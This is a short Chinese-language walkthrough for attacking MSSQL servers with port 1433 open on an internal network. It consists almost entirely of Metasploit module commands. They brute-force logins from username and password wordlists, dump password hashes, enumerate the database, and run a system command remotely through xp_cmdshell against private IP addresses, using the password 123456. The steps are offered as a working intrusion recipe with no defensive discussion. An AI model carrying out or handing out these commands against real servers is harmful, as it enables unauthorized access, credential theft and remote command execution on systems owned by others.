1.在內網環境中收集開放1433端口的服務器:
這個步驟可以參考此篇文章:https://www.cnblogs.com/xiehong/p/12502100.html
2.針對開放1433端口的服務器開始滲透:
2.1利用msf 爆破1433端口:192.168.10.251
(1)use auxiliary/scanner/mssql/mssql_login
(2)set RHOSTS 192.168.109.139
(3)set USER_FILE /home/xh/shentou/usr_mysql.txt
(4)set PASS_FILE /home/xh/shentou/pwd_mysql.txt
(5)run
2.2查找/捕獲服務器的口令
(1)use auxiliary/scanner/mssql/mssql_hashdump
(2)set RHOSTS 192.168.10.251
(3)set PASSWORD 123456
(4)run
2.3瀏覽MSSQL
(1)use auxiliary/admin/mssql/mssql_enum
(2)set RHOSTS 192.168.10.236
(3)set PASSWORD 123456
(4)run
2.4重新載入xp_cmd功能
(1)use auxiliary/admin/mssql/mssql_exec
(2)set CMD 'ipconfig'
(3)set RHOSTS 192.168.10.251
(4)set PASSWORD 123456
(5)run
